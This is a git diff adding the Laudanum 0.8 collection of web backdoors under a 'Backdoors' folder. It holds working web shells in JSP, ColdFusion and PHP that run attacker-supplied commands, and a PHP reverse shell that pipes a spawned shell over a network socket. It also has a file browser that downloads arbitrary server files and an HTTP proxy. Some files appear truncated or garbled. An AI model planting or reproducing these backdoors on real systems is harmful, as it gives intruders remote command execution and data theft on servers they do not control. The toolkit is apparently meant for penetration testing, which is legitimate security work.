+Get the latest version at laudanum.secureideas.net. + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx new file mode 100644 index 0000000..f82ed13 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx @@ -0,0 +1,144 @@ +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - DNS + + + +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + + \ No newline at end of file diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm new file mode 100644 index 0000000..be0466b --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm @@ -0,0 +1,80 @@ ++ + + + + ++ + Laudanum Coldfusion Shell + + + ++ +Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. + ++
++ #Replace(foo, "<", "<", "All")# +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war new file mode 100644 index 0000000..5bbf5af Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh new file mode 100644 index 0000000..3c89c12 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh @@ -0,0 +1,3 @@ +#!/bin/sh + +jar -cvf cmd.war warfiles/* diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF new file mode 100644 index 0000000..1df3391 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF @@ -0,0 +1,3 @@ +Manifest-Version: 1.0 +Created-By: 1.6.0_10 (Sun Microsystems Inc.) + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml new file mode 100644 index 0000000..688e583 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml @@ -0,0 +1,11 @@ + ++ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp new file mode 100644 index 0000000..e33d3c0 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp @@ -0,0 +1,41 @@ +<%@ page import="java.util.*,java.io.*"%> +<% + +if (request.getRemoteAddr() != "4.4.4.4") { + response.sendError(HttpServletResponse.SC_NOT_FOUND) + return; +} + +%> + ++ +Command +/cmd.jsp +Laudanum JSP Shell + +Commands with JSP + ++<% +if (request.getParameter("cmd") != null) { +out.println("Command: " + request.getParameter("cmd") + "+
"); +Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); +OutputStream os = p.getOutputStream(); +InputStream in = p.getInputStream(); +DataInputStream dis = new DataInputStream(in); +String disr = dis.readLine(); +while ( disr != null ) { +out.println(disr); +disr = dis.readLine(); +} +} +%> +
+ +Copyright © 2012, Kevin Johnson and the Laudanum team.
+Written by Tim Medin.
+Get the latest version at laudanum.secureideas.net. + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store new file mode 100644 index 0000000..321346b Binary files /dev/null and b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store differ diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php new file mode 100644 index 0000000..023927f --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php @@ -0,0 +1,161 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides access to DNS on the system. +*** Written by Tim MedinLaudanum PHP DNS Access + + +Fatal Error!
+' . $errstr . '
+in ' . $errfile . ', line ' . $errline . '.
+ +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + +Laudanum PHP DNS Access + + + + + + +DNS Query 0.1
+ + + +"; + echo "Result = "; + print_r($result); + echo "Auth NS = "; + print_r($authns); + echo "Additional = "; + print_r($addtl); + echo " "; +} +?> +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php new file mode 100644 index 0000000..97bf627 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php @@ -0,0 +1,195 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim MedinLaudanum PHP File Browser + + +Fatal Error!
+' . $errstr . '
+in ' . $errfile . ', line ' . $errline . '.
+ +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$dir = isset($_GET["dir"]) ? $_GET["dir"] : "."; +$file = isset($_GET["file"]) ? $_GET["file"] : ""; + +if ($file != "") { + if(file_exists($file)) { + + $s = split("/", $file); + $filename = $s[count($s) - 1]; + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($file)); + header("Content-Disposition: attachment; filename=\"".$filename."\""); + readfile($file); + die(); + } +} +?> + + + +Laudanum File Browser + + + + + + +Laudanum File Browser 0.1
+Home
+ +Directory listing of / "; +$breadcrumb = '/'; +foreach ($dirs as $d) { + if ($d != '') { + $breadcrumb .= $d . "/"; + echo "$d/ "; + } +} +echo ""; + +// translate .. to a real dir +$parentdir = ""; +for ($i = 0; $i < count($dirs) - 2; $i++) { + $parentdir .= $dirs[$i] . "/"; +} + +echo ""; +echo "
+Name Date Size ../ " . $f . " " . " " . $f . " " . " " . number_format(@filesize($curdir . $f)) . " Can't open directory
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php new file mode 100644 index 0000000..921c059 --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php @@ -0,0 +1,192 @@ + array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php new file mode 100644 index 0000000..1176fcd --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php @@ -0,0 +1,351 @@ + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim MedinLaudanum PHP Proxy + + +Fatal Error!
+' . $errstr . '
+in ' . $errfile . ', line ' . $errline . '.
+ +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(Laudanum PHP Proxy + + + + + + +Laudanum PHP Proxy
+ + +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + + + diff --git a/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php new file mode 100644 index 0000000..a36848a --- /dev/null +++ b/Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php @@ -0,0 +1,409 @@ + +*** Tim MedinLaudanum PHP Shell Access + + +Fatal Error!
+' . $errstr . '
+in ' . $errfile . ', line ' . $errline . '.
+ +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Get the latest version at laudanum.secureideas.net. + + + +'); + } +} + +set_error_handler('error_handler'); + + +function logout() { + $_SESSION = array('authenticated' => false); + if (isset($_COOKIE[session_name()])) + setcookie(session_name(), '', time()-42000, '/'); + session_destroy(); +} + + +function stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? $_POST['password'] : ''; +$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +///* Default settings --- these settings should always be set to something. */ +//$default_settings = array('home-directory' => '.'); + +///* Merge settings. */ +//$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +///* Attempt authentication. */ +//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && +// isset($ini['users'][$username])) { +// if (strchr($ini['users'][$username], ':') === false) { +// // No seperator found, assume this is a password in clear text. +// $_SESSION['authenticated'] = ($ini['users'][$username] == $password); +// } else { +// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); +// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); +// } +//} + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) + $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + +if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = '.'; + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. If the command is + * already in the history, then the old entry is removed before the + * new entry is put into the list at the front. */ + if (($i = array_search($command, $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + + array_unshift($_SESSION['history'], $command); + + /* Now append the commmand to the output. */ + $_SESSION['output'] .= '$ ' . $command . "\n"; + + /* Initialize the current working directory. */ + if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { + /* The current command is a 'cd' command which we have to handle + * as an internal shell command. */ + + if ($regs[1]{0} == '/') { + /* Absolute path, we use it unchanged. */ + $new_dir = $regs[1]; + } else { + /* Relative path, we append it to the current working + * directory. */ + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; + } + + /* Transform '/./' into '/' */ + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + + /* Transform '//' into '/' */ + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + + /* Transform 'x/..' into '' */ + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + + if ($new_dir == '') $new_dir = '/'; + + /* Try to change directory. */ + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; + } + + } elseif (trim($command) == 'exit') { + logout(); + } else { + + /* The command is not an internal command, so we execute it after + * changing the directory and save the output. */ + chdir($_SESSION['cwd']); + + // We canot use putenv() in safe mode. + if (!ini_get('safe_mode')) { + // Advice programs (ls for example) of the terminal size. + putenv('ROWS=' . $rows); + putenv('COLUMNS=' . $columns); + } + + /* Alias expansion. */ + $length = strcspn($command, " \t"); + $token = substr($command, 0, $length); + if (isset($ini['aliases'][$token])) + $command = $ini['aliases'][$token] . substr($command, $length); + + $io = array(); + $p = proc_open($command, + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + + /* Read output sent to stdout. */ + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); + } + /* Read output sent to stderr. */ + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); + } + + fclose($io[1]); + fclose($io[2]); + proc_close($p); + } + } + + /* Build the command history for use in the JavaScript */ + if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; + } +} + +?> + + + +Laudanum Shell + + + + + + + +Laudanum Shell
+ + + + +
+ + Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. + + + +